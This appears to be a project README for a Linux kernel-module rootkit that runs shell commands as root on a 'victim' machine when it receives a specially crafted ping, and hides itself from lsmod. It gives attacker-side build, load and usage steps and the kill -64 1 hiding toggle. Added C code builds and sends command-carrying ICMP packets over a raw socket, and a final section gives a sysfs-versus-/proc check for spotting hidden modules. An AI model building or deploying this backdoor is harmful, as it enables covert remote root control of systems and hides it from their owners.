linux-rootkit
Remote Linux Loadable Kernel Module (LKM) rootkit for Linux 5.x kernels. Shell commands are executed on the victim by sending it a specially crafted ping.
Magic ping - shell execution
Features:
- Remote shell command execution triggered by ping (ICMP echo request).
- Hiding (or showing) the kernel module from userspace.
Asciinema Demo
Compile
Compile the server (victim) kernel module:
cd server && make
Compile the client (attacker):
cd client && make
On the remote server (victim), load the module:
sudo insmod server.ko
On the local attacker machine, run the client. Root privilege is needed because the client sends ICMP packets through a raw socket (CAP_NET_RAW):
sudo ./client <victim ip address>
Every shell command you then type is executed on the remote victim with root privilege (some commands need their full path).
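The following is an added example, not code from this project: it shows in userspace how a shell command can ride inside an ICMP echo request, with the attacker side building the packet and a model of the checks the victim-side hook has to make before it executes anything. The `MAGIC` marker, the payload layout (marker, command, NUL) and the function names are assumptions made for this illustration; the real module's framing is not shown on the page.

```c
/* Added example, not the project's code: a "magic ping" carrying a command.
 * MAGIC and the payload layout are assumptions for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAGIC   "MAGIC-PING:"   /* assumed marker the kernel hook looks for */
#define MAX_CMD 512

/* RFC 1071 one's-complement checksum; over a valid ICMP message it returns 0. */
uint16_t icmp_checksum(const void *data, size_t len)
{
    const uint16_t *p = data;
    uint32_t sum = 0;
    while (len > 1) { sum += *p++; len -= 2; }
    if (len) sum += *(const uint8_t *)p;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Attacker side: serialise one echo request whose payload is MAGIC + cmd + NUL.
 * Returns the ICMP message length, or -1 if the command does not fit. */
int build_magic_ping(const char *cmd, uint16_t id, uint16_t seq,
                     uint8_t *out, size_t out_len)
{
    struct icmphdr h;
    size_t mlen = strlen(MAGIC), clen = strlen(cmd);
    size_t total = sizeof h + mlen + clen + 1;
    if (clen >= MAX_CMD || total > out_len) return -1;
    memset(&h, 0, sizeof h);
    h.type = ICMP_ECHO;
    h.un.echo.id = htons(id);
    h.un.echo.sequence = htons(seq);
    memcpy(out, &h, sizeof h);
    memcpy(out + sizeof h, MAGIC, mlen);
    memcpy(out + sizeof h + mlen, cmd, clen + 1);
    uint16_t ck = icmp_checksum(out, total);      /* checksum field is still 0 */
    memcpy(out + offsetof(struct icmphdr, checksum), &ck, sizeof ck);
    return (int)total;
}

/* Victim side, a userspace model of what the hook must verify before running
 * anything: echo type, intact checksum, marker, NUL-terminated command.
 * Returns 1 and copies the command into cmd if the packet is a magic ping. */
int parse_magic_ping(const uint8_t *pkt, size_t len, char *cmd, size_t cmd_len)
{
    struct icmphdr h;
    size_t mlen = strlen(MAGIC);
    if (len < sizeof h + mlen + 1) return 0;
    memcpy(&h, pkt, sizeof h);
    if (h.type != ICMP_ECHO || icmp_checksum(pkt, len) != 0) return 0;
    const char *payload = (const char *)pkt + sizeof h;
    if (memcmp(payload, MAGIC, mlen) != 0) return 0;
    if (pkt[len - 1] != '\0') return 0;            /* command must be terminated */
    if (strlen(payload + mlen) >= cmd_len) return 0;
    strcpy(cmd, payload + mlen);
    return 1;
}

/* Attacker side: send the packet over a raw socket (needs CAP_NET_RAW / root).
 * The kernel prepends the IP header for SOCK_RAW + IPPROTO_ICMP. */
int send_magic_ping(const char *dst_ip, const char *cmd)
{
    uint8_t pkt[sizeof(struct icmphdr) + MAX_CMD + 32];
    int n = build_magic_ping(cmd, (uint16_t)getpid(), 1, pkt, sizeof pkt);
    if (n < 0) return -1;
    struct sockaddr_in dst = { .sin_family = AF_INET };
    if (inet_pton(AF_INET, dst_ip, &dst.sin_addr) != 1) return -1;
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (s < 0) return -1;
    ssize_t w = sendto(s, pkt, n, 0, (struct sockaddr *)&dst, sizeof dst);
    close(s);
    return w == n ? 0 : -1;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <victim ip> <command>\n", argv[0]);
        return 1;
    }
    return send_magic_ping(argv[1], argv[2]) == 0 ? 0 : 1;
}
```

Because the command is executed as root, the parse side is the part worth getting right: a hook that matches only on the marker and skips the checksum and termination checks will run truncated or corrupted commands, and anyone who learns the marker can drive the host. On the wire this is still an ordinary echo request, so a normal ICMP reply from the victim's own stack will be observed unless the hook drops the packet after consuming it.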
Hide (show) the remote kernel module:
On the victim, send signal 64 to PID 1; the module intercepts it and toggles between hidden and shown:
kill -64 1
Use lsmod to check.
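lsmod only reads /proc/modules, so a module that has unlinked itself from the kernel's module list (the technique described in the "Linux Rootkits Part 5" reference below) disappears from it while its sysfs directory under /sys/module/<name> usually remains. The following is an added example, not part of this project, of a userspace check that compares the two views; it assumes that a loaded (as opposed to built-in) module is recognisable by the presence of an `initstate` attribute in its sysfs directory, and all function names are made up for this illustration. A rootkit that also removes its kobject from sysfs defeats this check, so it is a first pass, not proof of absence.

```c
/* Added example, not the project's code: flag modules that are present in
 * /sys/module but missing from /proc/modules (what lsmod shows). */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define MAX_MODS 1024
#define NAME_LEN 64

/* Parse /proc/modules text ("name size refcnt deps state addr" per line)
 * into an array of names. Returns the number of names parsed. */
int parse_proc_modules(const char *text, char names[][NAME_LEN], int max)
{
    int n = 0;
    const char *line = text;
    while (*line && n < max) {
        const char *end = strchr(line, '\n');
        size_t ll = end ? (size_t)(end - line) : strlen(line);
        size_t nl = strcspn(line, " \t\n");          /* first field is the name */
        if (nl > 0 && nl < NAME_LEN) {
            memcpy(names[n], line, nl);
            names[n][nl] = '\0';
            n++;
        }
        line += ll + (end ? 1 : 0);
    }
    return n;
}

static int in_list(const char *name, char names[][NAME_LEN], int n)
{
    for (int i = 0; i < n; i++)
        if (strcmp(names[i], name) == 0) return 1;
    return 0;
}

/* Names seen in sysfs that are absent from the proc list. Returns the count. */
int find_hidden(char sysfs[][NAME_LEN], int ns, char proc[][NAME_LEN], int np,
                char hidden[][NAME_LEN], int max)
{
    int h = 0;
    for (int i = 0; i < ns && h < max; i++)
        if (!in_list(sysfs[i], proc, np))
            strcpy(hidden[h++], sysfs[i]);
    return h;
}

/* Collect /sys/module entries of loaded modules. Assumption used here: loaded
 * modules expose an "initstate" attribute, built-in ones do not. */
int read_sysfs_modules(const char *sysdir, char names[][NAME_LEN], int max)
{
    DIR *d = opendir(sysdir);
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL && n < max) {
        char path[512];
        struct stat st;
        if (e->d_name[0] == '.' || strlen(e->d_name) >= NAME_LEN) continue;
        snprintf(path, sizeof path, "%s/%s/initstate", sysdir, e->d_name);
        if (stat(path, &st) == 0)
            strcpy(names[n++], e->d_name);
    }
    closedir(d);
    return n;
}

int main(void)
{
    static char proc[MAX_MODS][NAME_LEN], sys[MAX_MODS][NAME_LEN],
                hid[MAX_MODS][NAME_LEN];
    static char text[1 << 18];
    FILE *f = fopen("/proc/modules", "r");
    if (!f) { perror("/proc/modules"); return 1; }
    size_t r = fread(text, 1, sizeof text - 1, f);
    text[r] = '\0';
    fclose(f);
    int np = parse_proc_modules(text, proc, MAX_MODS);
    int ns = read_sysfs_modules("/sys/module", sys, MAX_MODS);
    if (ns < 0) { perror("/sys/module"); return 1; }
    int nh = find_hidden(sys, ns, proc, np, hid, MAX_MODS);
    for (int i = 0; i < nh; i++)
        printf("in /sys/module but not in /proc/modules: %s\n", hid[i]);
    return nh ? 2 : 0;
}
```

Run it as an ordinary user before and after `kill -64 1` on the victim: the module's name should move from "listed in both" to "flagged". The exit status is 2 when anything is flagged, so the check can be dropped into a cron job or a host-integrity script.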
Thanks && References:
- Hacking the Linux Kernel Network Stack
- Does tcpdump bypass iptables?
- linux-network-programming-ping.c
- Given a git commit hash, how to find out which kernel release contains it?
- Linux Rootkits Part 5: Hiding Kernel Modules from Userspace
- Hooking Linux Kernel Functions, Part 2: How to Hook Functions with Ftrace